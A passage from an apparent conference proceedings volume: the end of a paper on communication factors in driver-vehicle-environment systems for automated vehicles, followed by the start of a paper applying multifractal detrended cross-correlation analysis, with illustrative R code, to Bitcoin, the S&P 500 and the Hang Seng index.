| 2.1. Poor visibility | 2 | 1 | 1 |
| 2.2. The presence of sound signals | 1 | 1 | 1 |
| 2.3. Abrupt changes in the direction of movement | 2 | 1 | 1 |
| 2.4. Negligent attitude to the technical condition of the vehicle | 2 | 1 | 1 |
| 2.5. Traffic accident | 8 | 7 | 6 |
| 2.5.1. With the participation of vehicles | 8 | 8 | 8 |
| 2.5.2. Without the participation of the vehicles | 6 | 4 | 2 |
| 2.6. Occurrence of an emergency situation | 9 | 8 | 8 |
| 2.6.1. Observation error | 6 | 4 | 1 |
| 2.6.2. Wrong decision or action | 5 | 3 | 2 |
| 2.6.3. Insufficient reaction | 5 | 3 | 2 |
| 2.6.4. An unpredictable situation | 5 | 2 | 1 |
| 2.7. Unknown location for the driver | 1 | 1 | 1 |
| Tactical level group (vehicle component management) | | | |
| 3.1. Position of governing bodies | 1 | 1 | 1 |
| 3.2. Sharp pressure on the accelerator pedal by the driver | 1 | 1 | 1 |
| 3.3. Vehicle transmission failure | 7 | 6 | 6 |
| 3.3.1. Inconsistency of gear shifting | 5 | 4 | 1 |
| 3.3.2. A sharp change in gear ratio | 3 | 2 | 1 |
| 3.4. Application of optical devices | 2 | 1 | 0 |
| 3.5. Application of sound devices | 2 | 1 | 0 |
| Environmental change group | | | |
| 4.1. Road coverage | 8 | 7 | 4 |
| 4.1.1. Smooth | 7 | 4 | 3 |
| 4.1.2. Rough | 7 | 5 | 4 |
| 4.1.3. With potholes | 7 | 5 | 5 |
| 4.1.4. With obstacles | 7 | 5 | 5 |
| 4.1.5. Dry | 7 | 4 | 2 |
| 4.1.6. Wet | 7 | 4 | 2 |
| 4.1.7. Sludge (wet snow) | 8 | 5 | 4 |
| 4.1.8. Ice | 8 | 5 | 4 |
| 4.2. Curvature of the trajectory | 6 | 4 | 2 |
| 4.3. Nebula and humid air | 3 | 1 | 0 |
| 4.4. Lack of road signs | 2 | 1 | 0 |
| 4.5. Lack of road markings | 2 | 1 | 0 |
| 4.6. Road lighting | 1 | 1 | 1 |
| 4.6.1. Daylight | 2 | 1 | 0 |
| 4.6.2. Evening and morning light | 2 | 1 | 0 |
| 4.6.3. Night lighting | 2 | 1 | 0 |
| 4.6.4. Intensity and direction of illumination | 2 | 1 | 1 |
| 4.7. Contamination of vehicles | 2 | 1 | 1 |
The given table focuses on the factors that should be combined with communication technologies to avoid the previously described conflict situations during the operation of the D-V-E system.
4 The Results of the Application of Communication Technologies in the D-V-E System

We use sensation as the simplest cognitive process of reflection, in the human brain, of certain qualities and properties of objects due to the action of a stimulus on the analyzer. The most common sensations are visual, auditory, and tactile. We see the automation of the D-V-E system as reducing the entropy of the human senses (Fig. 4) involved in the management of the D-V-E system and creating for the driver an information flow of control and analytical data [20]. Optimization of the D-V-E system is achieved by creating stimuli for objects of artificial origin that are equated to stimuli for a person. Due to this, the reaction and adaptation of the automatic system are as close as possible to the nature of human action.

We form the communicative processes in the D-V-E system and present them in Table 3. In this table, the communicative factors listed in Table 2 are divided into several levels; each level is summarized according to the characteristics and properties of the factors. Factors affect the objects of the D-V-E system in different ways, creating the various communicative processes formed in Table 3. Complementing the structural scheme of distribution of control signals [21] with these communicative processes, we obtain a general scheme of optimization of the D-V-E system, where the arrow indicates the optimized operation of the automated vehicle (Fig. 5). This publication is a continuation of the authors' scientific research and is the basis for the creation of a neural network for an intelligent vehicle control system.
Fig. 4. Diagram of estimates of communicative factors of the D-V-E system
Table 3. Communicative processes in the D-V-E system

Object | Material level | Functional level | Parametric level
The driver | human body | approach to vehicles, landing on vehicles, vehicle management, analysis of road events, decision-making in dynamic events and change of route | physical and chemical properties (volume, weight, geometric parameters, temperature, pressure, etc.), age, driving experience and psychophysical condition
Vehicle | material and technical means in general | movement on the set trajectory, movement in the set direction and space, interaction with objects of the transport system, transportation of people and material objects, creation of ergonomic and comfortable conditions for the driver | physical and chemical properties, individual, public, transportation services and service
Environment | transport infrastructure and natural environment | pavement, signs, markings, irregularities, lighting conditions and obstacles to movement | physical and chemical properties, illumination, relief and quality of the road surface
Fig. 5. Scheme of optimization of the D-V-E system
According to the provided scheme, communication links are formed that are aimed at avoiding a number of the conflicts described above. The communicative processes according to the proposed scheme take place with the least human influence on the D-V-E system. This approach to automation and autonomy does not contradict the levels of the SAE standards [15].
5 Conclusions

The existing transport infrastructure is being upgraded to enable the full integration of intelligent vehicles while remaining suitable for conventional vehicles. Therefore, the current paradigms of driving a vehicle will have to change as the level of vehicle intellectualization and autonomy grows. The development of modern information technologies in transport is gradually moving toward realizing the connection between the psychophysical state of the driver and the process of driving the vehicle, and the introduction of the network capabilities of the Internet expands the communication capabilities of the D-V-E system. Thanks to the application of the communicative processes proposed by the authors in this article to D-V-E systems, the system's response and adaptation approach the driver's adaptation, which reduces a number of conflicts and optimizes the functionality of both the system and each of its objects.

Based on the results of the survey of respondents, an evaluation of the influencing factors was obtained according to the three criteria mentioned above. According to these results, the influence of factors related to the technical condition of the vehicle and the psychophysical condition of the driver prevails. The factors that are directly related to the communication links of the D-V-E system and have a significant impact on the avoidance of intra-system conflicts and on the psychophysical state of the driver have been identified. Therefore, the communicative connections and interactions in the D-V subsystem have an advantage over those in the V-E and D-E subsystems in the integral D-V-E system. The level of influence of objects on each other changes, which is permissible during the operation of the D-V-E system.

The entropy of the driver's sense organs involved in controlling the D-V-E system is reduced, an information flow of control and analytical data is created for the driver, and the reaction and adaptation of the automatic D-V-E system become as close as possible to the nature of human (driver) actions. In this way, an increase in the level of automation of transport systems is achieved that does not disrupt the connection between the objects of the D-V-E system as a whole. The scheme for optimizing the operation of an automated vehicle obtained as a result of the research is the basis for creating a neural network for an intelligent vehicle control system in the future.

Acknowledgements. The authors express their gratitude to the Cherkasy SRFC of the MIA of Ukraine. Personal thanks to the director of the Cherkasy SRFC of the MIA of Ukraine, Aksionov Vasyl Vasylovych.
References

1. Facial Recognition Is Already Here: These Are the 30+ US Companies Testing the Technology. https://www.cbinsights.com/research/facial-recognition-technology-us-corporations/
2. Brummelen, J. Van, O'Brien, M., Gruyer, D., Najjaran, H.: Autonomous vehicle perception: the technology of today and tomorrow. Transp. Res. Part C: Emerg. Technol. (2018)
3. Hummel, T.: BMW, Daimler seal self-driving tech partnership. Automotive News Europe (2019). https://www.europe.autonews.com/automakers/bmw-daimler-seal-self-driving-tech-partnership
4. Wang, X.: Driver-centered human-machine interface design: design for a better takeover experience in level 4 automated driving. Master's thesis (2020)
5. Types of Vehicle Connectivity. https://blog.rgbsi.com/7-types-of-vehicle-connectivity
6. Martínez-Díaz, M., Soriguera, F.: Autonomous vehicles: theoretical and practical challenges. Transp. Res. Proc. 33, 275–282 (2018). https://doi.org/10.1016/j.trpro.2018.10.103. ISSN 2352-1465
7. Garcia, M., et al.: A tutorial on 5G NR V2X communications. IEEE Commun. Surv. Tutor. (2021). https://doi.org/10.1109/COMST.2021.3057017
8. Kunda, N., Lopotukha, E.: Application of information technologies in transport. InterConf. 84, 403–410 (2021). https://doi.org/10.51582/interconf.7-8.11.2021.040
9. The Future of the In-Vehicle Experience. https://www.cbinsights.com/research/report/in-vehicle-experience-technology-future/
10. Curley, P.: An environmentally aware auto – teaching the car about the world around it. SAE Technical Paper 2008-21-0050 (2008)
11. Coles, Z.A., Beyerl, T.A., Augusma, I., Soloiu, V.: From sensor to street – intelligent vehicle control systems. Pap. Publ.: Interdisc. J. Undergr. Res. 5(9) (2016)
12. Migal, V.D., Maidan, H.: Intellectual systems in technical operation of cars: monograph (2018)
13. Cheng, W.: Research on the key technologies of intelligent vehicle control. In: 3rd International Conference on Management, Education, Information and Control (MEICI), Nanchang (2015)
14. SAE International: SAE Levels of Driving Automation (2013). http://cyberlaw.stanford.edu/loda
15. SAE Standard J3016: Taxonomy and definitions for terms related to on-road motor vehicle automated driving systems, levels of driving automation (2014)
16. Van den Beukel, A.P., Van der Voort, M.C.: Evaluation of ADAS with a supported-driver model for desired allocation of tasks between human and technology performance. In: Meyer, G., Valldorf, J., Gessner, W. (eds.) Advanced Microsystems for Automotive Applications 2009, pp. 187–208. Springer, Berlin (2009). https://doi.org/10.1007/978-3-642-00745-3_13
17. Ramm, S.A.: Framework of 10 characteristics and perceptions of natural-feeling driver-car interaction from the contextual inquiry naturalness framework for driver-car interaction. PhD thesis, Department of Design, CEDPS, Brunel University (2018)
18. The Autonomous Vehicle Global Study, Abridged Version in Slides. https://www.ptolemus.com/research/the-autonomous-vehicle-global-study-2017-abridged-version-in-slides/
19. Kalinina, I.O., Gozhiy, O.P., Musenko, G.O.: Consideration of competence of experts in methods of multicriteria analysis in problems of rational choice. Sci. Works Petro Mohyla Black Sea State Univ., Ser.: Comput. Technol. 179, 116–123 (2012)
20. Lytovchenko, V.V., Kreyda, A.M., Pidhornyy, M.V.: Information model of driving a vehicle with a continuously variable transmission. In: Automation-2017: XXIV International Conference on Automatic Control, Kyiv, pp. 209–210 (2017)
21. Lytovchenko, V.V., Pidhornyy, M.V.: Choosing a method of designing a vehicle control system. In: Proceedings of the All-Ukrainian Scientific and Technical Conference on Modern Trends in the Development of Mechanical Engineering and Transport, pp. 144–148. KrNU, Kremenchuk (2020)
Computer Modeling and Information Systems in Economics
The Analysis of Multifractal Cross-Correlation Connectedness Between Bitcoin and the Stock Market

Andrii Bielinskyi1, Vladimir Soloviev1,3(B), Victoria Solovieva2, Andriy Matviychuk1,3, and Serhiy Semerikov1

1 Department of Computer Science and Applied Mathematics, Kryvyi Rih State Pedagogical University, Kryvyi Rih, Ukraine
[email protected]
2 Department of Information Technologies and Modelling, State University of Economics and Technology, Kryvyi Rih, Ukraine
3 Department of Mathematical Modelling and Statistics, Kyiv National Economic University named after Vadym Hetman, Kyiv, Ukraine
Abstract. In this study, we examine the multifractal cross-correlation relationships between the stock and cryptocurrency markets. The measures of complexity that can serve as indicators (indicators-precursors) in both markets are retrieved from multifractal detrended cross-correlation analysis. Using the example of the S&P 500 and HSI stock indices, which investors most often use to gauge the state of the world economy, and the cryptocurrency Bitcoin, which largely determines the existence of the crypto market, we assess the variation of multifractality and correlations in both markets. Using the sliding window approach, we localize their dynamics across time and indicate a high degree of non-linearity, with dominant anti-persistency during crash periods for each index. The existence of periods with high and low cross-correlations between the stock and crypto markets provides prospects for reliable trading with several pairs of assets and effective diversification of their risks.

Keywords: Stock market · crypto market · cross-correlations · multifractal analysis · crash · complex systems · indicator-precursor
1 Introduction

After the COVID-19 pandemic and during the Russia-Ukraine war [1, 7, 8, 24, 25, 28, 37, 46, 53], decentralized finance, with Bitcoin (BTC) as one of its most popular representatives, gained rapid popularity [2, 10, 17, 19, 50]. These innovations attracted attention from policymakers, financial regulators, scientists, and ordinary people who, despite the regulatory laws of their countries, continue to use the benefits of decentralized financial operations and to analyze them from the perspective of complex systems [15, 47, 57].
Since approximately June 2021, the correlation between the stock and crypto markets has been on an upward trend. In particular, this can be connected to the growing number of financial instruments in the crypto market, which makes investors behave similarly to how they behave in the stock market. Since BTC is still a developing digital asset, its fluctuations are violent and its further dynamics is a subject of speculation. Thus, correlations between the stock and crypto markets vary across time, demonstrating non-linear dependence.

One possible approach to measuring long-term memory (correlations) in time series, called rescaled range analysis (R/S), was proposed by Hurst [22]. Lo found that classical R/S analysis is sensitive to the short-term memory of a system, which may lead to bias errors for nonstationary time series [32]. Considering the limitations of R/S analysis, Peng et al. [40] developed detrended fluctuation analysis (DFA). Kantelhardt extended classical DFA to multifractal DFA, which makes it possible to study the long-term memory of both small and large fluctuations using a range of statistical moments [27]. The methods of interest to us were developed by Podobnik and Stanley [41] and then extended to a multifractal version by Zhou [56]; they make it possible to study long-range cross-correlations between two nonstationary time series such as the crypto and stock markets. Classical multifractal DFA (MF-DFA) and the multifractal extension of detrended cross-correlation analysis (MF-DCCA) have been widely applied to such complex financial systems as foreign exchange markets, stock markets, the crude oil market, carbon and commodity markets, futures, investment strategies, and even Twitter happiness sentiment and mass and new media [9, 13, 31, 33–36, 54, 55].

The aim of this study is to examine the degree of cross-correlation between two of the most capitalized and developed stock markets, those of the USA and China, represented by the Standard and Poor's 500 (S&P 500) and the Hang Seng (HSI), and the cryptocurrency market represented by BTC. All data are taken from Yahoo! Finance [48] for the period from September 15, 2014 to May 22, 2022 to make them comparable with the data range of BTC provided by the mentioned data source. We also present indicators (indicators-precursors) of crash phenomena in the stock and crypto markets based on MF-DCCA.
2 Multifractal Detrended Cross-Correlation Analysis

Multifractal detrended cross-correlation analysis, derived from standard DCCA, gives multifractal characteristics derived from power-law cross-correlations of time series [56]. This approach modifies the standard detrended covariance fluctuation function to the q-th order. For its calculation, we take two time series $\{x_i \mid i = 1, 2, \ldots, N\}$ and $\{y_i \mid i = 1, 2, \ldots, N\}$ and find their cumulative profiles $X(i) = \sum_{k=1}^{i} [x_k - \langle x \rangle]$ and $Y(i) = \sum_{k=1}^{i} [y_k - \langle y \rangle]$, where $\langle \cdot \rangle$ is the average of the analyzed series. Then, by dividing the series into $N_s \equiv \mathrm{int}(N/s)$ non-overlapping segments $v$ of equal length $s$, we explore how the covariance of the residuals of the two systems evolves:

$$f^{2}(v,s) = \frac{1}{s}\sum_{i=1}^{s}\bigl\{X[(v-1)s+i] - \tilde{X}_{v}(i)\bigr\} \times \bigl\{Y[(v-1)s+i] - \tilde{Y}_{v}(i)\bigr\}, \qquad (1)$$

where $\tilde{X}_{v}(i)$ and $\tilde{Y}_{v}(i)$ are m-order polynomials fitted to each sub-series $v$.
Since N is usually not an integer multiple of s, we may neglect the last part of a time series. Thus, we repeat the division procedure from the end of the series and obtain $2N_s$ sub-series $v$ ($v = 1, \ldots, 2N_s$). Then, we apply the equation above to the reversed segments:

$$f^{2}(v,s) = \frac{1}{s}\sum_{i=1}^{s}\bigl\{X[N-(v-1)s+i] - \tilde{X}_{v}(i)\bigr\} \times \bigl\{Y[N-(v-1)s+i] - \tilde{Y}_{v}(i)\bigr\}. \qquad (2)$$

As the result, we calculate the fluctuation function $F_q(s)$ for combinations of various scales $s$ and statistical moments $q$:

$$F_q(s) = \begin{cases} \left\{\dfrac{1}{2N_s}\displaystyle\sum_{v=1}^{2N_s}\left[f^{2}(v,s)\right]^{q/2}\right\}^{1/q}, & q \neq 0, \\[3mm] \exp\left\{\dfrac{1}{4N_s}\displaystyle\sum_{v=1}^{2N_s}\ln f^{2}(v,s)\right\}, & q = 0. \end{cases} \qquad (3)$$
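For illustration, Eqs. (1)–(3) can be sketched in R. The paper does not publish code, so this is a minimal illustrative implementation, not the authors' own; taking the absolute value of the detrended covariance before raising it to the power q/2 is a common convention in MF-DCCA implementations and is an assumption here.

```r
# Minimal sketch of Eqs. (1)-(3): base R, polynomial detrending of order m.
mfdcca_fq <- function(x, y, s, q_values, m = 2) {
  N  <- length(x)
  X  <- cumsum(x - mean(x))   # cumulative profile of x
  Y  <- cumsum(y - mean(y))   # cumulative profile of y
  Ns <- floor(N / s)
  # forward segments v = 1..Ns, then the same division repeated
  # from the end of the series (reversed segments), 2*Ns in total
  fwd <- lapply(seq_len(Ns), function(v) ((v - 1) * s + 1):(v * s))
  bwd <- lapply(seq_len(Ns), function(v) (N - v * s + 1):(N - (v - 1) * s))
  f2 <- vapply(c(fwd, bwd), function(ii) {
    t  <- seq_along(ii)
    rx <- residuals(lm(X[ii] ~ poly(t, m, raw = TRUE)))  # detrended X profile
    ry <- residuals(lm(Y[ii] ~ poly(t, m, raw = TRUE)))  # detrended Y profile
    mean(rx * ry)             # detrended covariance, Eqs. (1)-(2)
  }, numeric(1))
  # q-th order fluctuation function, Eq. (3); |f2| is an assumption
  vapply(q_values, function(q) {
    if (abs(q) < 1e-10) exp(0.5 * mean(log(abs(f2))))
    else mean(abs(f2)^(q / 2))^(1 / q)
  }, numeric(1))
}
```

Evaluating mfdcca_fq() over a grid of scales and regressing log Fq(s) on log s for each q then yields the generalized exponent hxy(q) discussed below.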
By analyzing the log-log plots of $F_q(s)$ versus $s$, we can obtain the scaling behavior of the fluctuation function. In particular, if the time series are power-law cross-correlated, then $F_q(s) \propto s^{h_{xy}(q)}$, where $h_{xy}(q)$ represents a multifractal generalization of the power-law cross-correlation Hurst exponent. For q = 2, it is the cross-correlation scaling exponent, which is similar to the known Hurst exponent H [22]. This extension of the Hurst exponent works in the same way:

1. If hxy(2) > 0.5, the cross-correlations between the time series are persistent: an increase (a decrease) in one time series is followed by an increase (a decrease) in the other time series.
2. If hxy(2) < 0.5, the cross-correlations between the time series are anti-persistent: an increase in one time series is likely to be followed by a decrease in the other time series.
3. If hxy(2) ≈ 0.5, both time series follow a random walk, i.e., there are no correlations between them.
4. If hxy(2) > 1, both time series are highly correlated and non-stationary.

Values of q emphasize the density of small (large) fluctuations. If those values are negative, we place an accent on the scaling properties of small fluctuations; for positive values, the scaling properties of large magnitudes dominate. Generally, if the multifractal characteristics do not depend on the q values, the studied time series is monofractal.

Besides the cross-correlation Hurst exponent, using the standard DCCA algorithm we can compute the standard DCCA cross-correlation coefficient ρDCCA(s) between time series [52]:

$$\rho_{DCCA}(s) = \frac{F^{2}_{DCCA}(s)}{F_{DFA\{x\}}(s) \times F_{DFA\{y\}}(s)}. \qquad (4)$$
In (4), $F^{2}_{DCCA}(s)$ is the detrended covariance function between x and y from DCCA; $F_{DFA}(s)$ is the standard DFA fluctuation function [40], and $-1 \leq \rho_{DCCA}(s) \leq 1$. Similarly to the classical correlation coefficient, ρDCCA = 1 means that the time series are positively correlated and co-move synchronically; ρDCCA = −1 denotes that the time series move anti-persistently; ρDCCA = 0 indicates that there is no correlation between the two time series. For further calculations, through the multifractal (Rényi) mass exponent $\tau(q) = qh_{xy}(q) - 1$ [38], we define the singularity strength (Hölder exponent) through a Legendre transform [18, 20, 21]:
$$\alpha(q) = h_{xy}(q) + q\,\frac{dh_{xy}(q)}{dq} \qquad (5)$$

and the singularity (multifractal) spectrum [18, 21]:

$$f(\alpha) = q\left[\alpha(q) - h_{xy}(q)\right] + 1. \qquad (6)$$
If critical events dominate in the system, the singularity spectrum has a long left tail, indicating the dominance of large events. A right-tailed multifractal spectrum indicates sensitivity to events of small magnitude. A symmetrical spectrum represents an equal distribution of small and large fluctuations. In addition to the characteristics presented above, we calculate the width of the multifractal spectrum, defined as

$$\Delta\alpha = \alpha_{max} - \alpha_{min}. \qquad (7)$$
In (7), αmin and αmax are the ends of f(α). The wider Δα is, the more complex the structure, the more uneven the distribution, and the more violent the fluctuations on the surface of the time series. On the contrary, a smaller multifractal width indicates that the time series is uniformly distributed, and thus its structure is much simpler. Besides Δα of the whole spectrum, we can calculate the widths of its left (ΔL) and right (ΔR) tails:

$$\Delta L = \alpha_{0} - \alpha_{min}, \qquad \Delta R = \alpha_{max} - \alpha_{0}, \qquad (8)$$

for which $\alpha_{0} = \operatorname{argmax}_{\alpha} f(\alpha)$. The wider one of these widths is, the more uneven the distribution. A greater value of ΔL points to a wider left tail of the multifractal spectrum, which corresponds to higher complexity due to large fluctuations. On the contrary, if ΔR becomes wider, we have higher complexity due to fluctuations of small magnitude. If both values are equal, small and large fluctuations are uniformly distributed. Such asymmetry (skewness) is better reflected by the long tail type ΔS [23]:

$$\Delta S = \Delta R - \Delta L \qquad (9)$$

and the asymmetry coefficient A [14, 16, 39]:

$$A = \frac{\Delta L - \Delta R}{\Delta L + \Delta R}. \qquad (10)$$
A negative value of A highlights the dominance of small fluctuations (right-sided asymmetry). Consequently, positive values of A denote an increase in heterogeneity for large fluctuations (left-sided asymmetry). When A = 0, the spectrum is symmetric. For ΔS < 0, we have a wider left tail, which indicates insensitivity of a time series to small fluctuations, while for ΔS > 0 we expect a less fluctuating time series. Another option is to find the difference between the maximum and minimum probability subsets, Δf [11, 12, 51]:

$$\Delta f = f(\alpha_{min}) - f(\alpha_{max}). \qquad (11)$$

For Δf < 0, there is a higher chance that a decreasing direction occurs, while for Δf > 0 we have the opposite relation.
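To make these measures concrete, the sketch below (an illustrative continuation of the previous sketch, not the authors' code) estimates hxy(q) from the log-log regression of Fq(s) on s and derives the spectrum indicators of Eqs. (5)–(11); the derivative in Eq. (5) is approximated by central differences. The coefficient ρDCCA of Eq. (4) can be computed analogously, but the sign of the detrended covariance must then be preserved rather than taken in absolute value.

```r
# Spectrum-based indicators from Eqs. (5)-(11); names are illustrative.
mfdcca_indicators <- function(x, y, scales, q_values, m = 2) {
  # F_q(s) for every scale: rows = scales, columns = q
  Fq <- t(sapply(scales, function(s) mfdcca_fq(x, y, s, q_values, m)))
  # h_xy(q): slope of log F_q(s) versus log s for each q
  h <- apply(Fq, 2, function(col) unname(coef(lm(log(col) ~ log(scales)))[2]))
  # Eq. (5): alpha(q) = h(q) + q * dh/dq, via central differences
  n  <- length(q_values)
  dh <- rep(NA_real_, n)
  dh[2:(n - 1)] <- (h[3:n] - h[1:(n - 2)]) / (q_values[3:n] - q_values[1:(n - 2)])
  alpha <- h + q_values * dh
  f_a   <- q_values * (alpha - h) + 1               # Eq. (6)
  ok <- !is.na(alpha); a <- alpha[ok]; fa <- f_a[ok]
  a0 <- a[which.max(fa)]                            # argmax of f(alpha)
  dL <- a0 - min(a); dR <- max(a) - a0              # Eq. (8)
  list(h_xy2   = h[which.min(abs(q_values - 2))],   # cross-corr. Hurst exponent
       d_alpha = max(a) - min(a),                   # Eq. (7)
       d_S     = dR - dL,                           # Eq. (9)
       A       = (dL - dR) / (dL + dR),             # Eq. (10)
       d_f     = fa[which.min(a)] - fa[which.max(a)]) # Eq. (11)
}
```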
3 Experiments and Empirical Results

Further, to measure the degree of multifractal cross-correlations between the S&P 500, HSI, and BTC, we present the comparative dynamics of the described indicators, calculated with the sliding window approach [5, 6], along with the studied series. The presented measures are calculated for the standardized returns of the S&P 500, HSI, and BTC, where returns are calculated as

$$G(t) = \ln x(t + \Delta t) - \ln x(t) \cong \frac{x(t + \Delta t) - x(t)}{x(t)} \qquad (12)$$
for $t = 1, \ldots, N - 1$. Here, N is the length of the initial time series, and the standardized version of G can be calculated as $g(t) \cong [G(t) - \langle G \rangle]/\sigma$, with σ representing the standard deviation of G; Δt is the time lag (in our case Δt = 1); ⟨···⟩ is the average over the time period under study. The figures below include such measures as:

• the cross-correlation multifractal function Fq(s), the generalized cross-correlation Hurst exponent hxy(q), the multifractal cross-correlation Rényi exponent τ(q), and the multifractal cross-correlation spectrum f(α);
• the DCCA correlation coefficient ρDCCA for long-term (s = 250 days, ρlast) and mid-term (s = 125 days, ρmiddle) behavior;
• the generalized cross-correlation Hurst exponent hxy(2);
• the width of the multifractal spectrum Δα;
• the singularity exponents α0, αmin, αmean, αmax;
• the widths of the left (ΔL) and right (ΔR) tails of f(α);
• the long tail type ΔS;
• the asymmetry coefficient A;
• the height of the multifractal spectrum Δf.

We expect our indicators to behave in a particular way (to increase or decrease) during a critical event. The cross-correlation measures are estimated with:

• a sliding window of 250 days and a step size of 1 day;
• m = 2 for fitting local trends in Eqs. (1) and (2);
• values of q ∈ [−5; 5] with a step of 0.1, to have a better view of scales with small and large fluctuation density;
• a time scale s varying from 10 to 1000 days for the whole time series and from 10 to 250 days for the sliding window method.

The sketch below illustrates this preprocessing and estimation setup; Fig. 1 then presents the multifractal characteristics of the pair S&P 500-BTC.
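As with the earlier sketches, the following is an illustrative R implementation under stated assumptions (two aligned daily price series; the helper mfdcca_indicators() defined above), not the authors' published code.

```r
# Standardized returns of Eq. (12): log-returns, then z-scoring
std_returns <- function(price) {
  G <- diff(log(price))       # G(t) with time lag of 1 day
  (G - mean(G)) / sd(G)       # g(t) = [G(t) - <G>] / sigma
}

# Rolling indicators over a 250-day window with a 1-day step
rolling_indicators <- function(px, py, window = 250,
                               scales = seq(10, 250, by = 10),
                               q_values = seq(-5, 5, by = 0.1)) {
  gx <- std_returns(px); gy <- std_returns(py)   # assumes aligned series
  ends <- seq(window, length(gx), by = 1)
  rows <- lapply(ends, function(e) {
    i <- (e - window + 1):e
    as.data.frame(mfdcca_indicators(gx[i], gy[i], scales, q_values))
  })
  do.call(rbind, rows)
}
```

Each row of the result corresponds to one window position, so the indicator series can be plotted along with the index itself, as in the figures that follow.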
Fig. 1. The log-log plot of the cross-correlation fluctuation function Fq(s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy(q) versus the order q (b), the multifractal cross-correlation mass exponent τ(q) versus the order q (c), and the multifractal cross-correlation spectrum f(α) versus the cross-correlation singularity exponent α (d) for the pair S&P 500-BTC
In Fig. 1(a), the fluctuation function Fq(s) follows a power law, and it appears to be wide for s < 100. In Fig. 1(b), we see that hxy(q) is non-linear. For q < 0, the generalized cross-correlation Hurst exponent indicates distinctly persistent dynamics, whereas for large fluctuations (q > 0) between the two indices we should expect anti-persistent dynamics.
In Fig. 1(c), the multifractal Rényi exponent remains mostly linear for q < 0, which is an indicator of mostly monofractal cross-correlation dynamics of small fluctuations, while for q > 0 the cross-correlation dynamics demonstrates higher multifractality. Figure 1(d) demonstrates that f(α) is broad, which is an indicator of highly complex non-linear dynamics of the two systems. Moreover, this spectrum is skewed to the left. We can conclude that the multifractal cross-correlation structure formed by the S&P 500 and BTC has higher sensitivity to larger local fluctuations. In Fig. 2, the multifractal characteristics of the pair HSI-BTC are presented.
Fig. 2. The log-log plot of the cross-correlation fluctuation function Fq(s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy(q) versus the order q (b), the multifractal cross-correlation mass exponent τ(q) versus the order q (c), and the multifractal cross-correlation spectrum f(α) versus the cross-correlation singularity exponent α (d) for the pair HSI-BTC
In Fig. 2 we can see that the multifractal cross-correlations for HSI-BTC are weak. The fluctuation function Fq(s) in Fig. 2(a) follows a power law but, in general, appears to be narrow for all scales. In Fig. 2(b) we see that hxy(q) is non-linear. For q < 0, the generalized exponent hxy(q) > 0.59, which implies that small fluctuations between the two indices behave persistently. For large fluctuations (q > 0), the generalized exponent hxy(q) > 0.55, which shows that even large fluctuations between the two markets remain correlated.
In Fig. 2(c), the multifractal Rényi exponent remains mostly linear across different statistical moments q, which demonstrates that the cross-correlation multifractal behavior between the two markets is mostly weak. Figure 2(d) demonstrates that f(α) is not concentrated at one point, which proves that the cross-correlation dynamics of the studied systems demonstrates multifractal characteristics. The spectrum has a fairly uniform shape, which indicates a relatively uniform contribution of large and small fluctuations. However, compared to the other studied pairs, the spectrum of HSI-BTC looks narrow. We conclude that for these indices, over a range of q and s values, the multifractal cross-correlations are insignificant. Next, in Fig. 3 we present the multifractal characteristics of the two stock indices, S&P 500 and HSI.
Fig. 3. The log-log plot of the cross-correlation fluctuation function Fq(s) versus time scale s (a), the generalized cross-correlation Hurst exponent hxy(q) versus the order q (b), the multifractal cross-correlation mass exponent τ(q) versus the order q (c), and the multifractal cross-correlation spectrum f(α) versus the cross-correlation singularity exponent α (d) for the pair S&P 500-HSI
In Fig. 3 we can see that the multifractal cross-correlations for S&P 500-HSI are strong. The fluctuation function Fq(s) in Fig. 3(a) follows a power law, and it appears to be wide for a range of many scales. In Fig. 3(b) we see that hxy(q) is non-linear. For q < 0, the generalized exponent hxy(q) demonstrates that small fluctuations between the two stock indices represent persistent dynamics, whereas for large fluctuations (q > 0) the generalized cross-correlation Hurst exponent hxy(q) tends to be less than 0.50. In Fig. 3(c), the multifractal Rényi exponent remains mostly non-linear across different statistical moments q, which demonstrates that most of the cross-correlation behavior of the two markets exhibits a high degree of multifractality. Figure 3(d) demonstrates that f(α) is the broadest among the spectra, which implies that the multifractal cross-correlation dependence in the stock market is the largest. According to the presented spectrum, fluctuations of small and large magnitudes have approximately equal influence on each other. We conclude that for these indices, over a range of q and s values, the multifractal cross-correlations are significant.

In Fig. 4 we present the plots of ρDCCA versus time scale s for S&P 500-BTC, HSI-BTC, and S&P 500-HSI. Our analysis of the DCCA correlation coefficient across different time scales demonstrates that the cross-correlations between the stock indices and BTC are weak in the short term (less than 100 days) but tend to increase over a long-term period. For the pair HSI-BTC, the cross-correlations are weak even for s < 600 days; beyond that, the cross-correlation coefficient ρDCCA > 0.3. As expected for the stock market, both the S&P 500 and HSI demonstrate a high degree of correlation across many time scales. Using the sliding window approach, we can track across time how the non-linear dynamics of the two systems change in dependence on each other.
Fig. 4. The DCCA cross-correlation coefficient ρDCCA (s) versus time scale s for the pairs: S&P 500-BTC (a), HSI-BTC (b), and S&P 500-HSI (c)
Figure 5 presents the comparative dynamics of the coefficient ρDCCA along with the S&P 500 and HSI, calculated for the pairs S&P 500-BTC, HSI-BTC, and S&P 500-HSI. A noticeable long-term correlation can be observed for the periods since 2018. This correlation is also observed for the crisis caused by the coronavirus pandemic. By the end of 2021, both mid- and long-term cross-correlation coefficients had been decreasing, after which their dynamics started to demonstrate an upward trend.

Figure 6 demonstrates the performance of the cross-correlation Hurst exponent calculated for S&P 500-BTC, HSI-BTC, and S&P 500-HSI. The cross-correlation Hurst exponent decreased during the most noticeable crashes in the stock markets. We can see the same for the upward trend in stocks. Therefore, most of the time BTC behaved asymmetrically. Anti-persistent behavior during critical phenomena is also noticeable for both HSI and S&P 500.

The dynamics of Δα calculated for each pair is presented in Fig. 7. The width of multifractality remains a reliable indicator of critical phenomena for all indices. All of the figures demonstrate an increase in the width of multifractality during crash phenomena; this is especially noticeable during the COVID-19 crisis. However, the degree of multifractality decreased in 2021, when BTC had visually noticeable drops in price. This period in the BTC market will require further research.

In Fig. 8 we can see how all of the presented singularity exponents behave. In this case, their dynamics demonstrates behavior similar to Δα. At the same time, we can observe that the dynamics of the αmin indicator does not exhibit synchronous behavior along with the other singularity exponents. For the pair S&P 500-BTC it becomes higher over the last days, indicating a growth of multifractality. This will require additional research, but the signal of this indicator may turn out to be false.

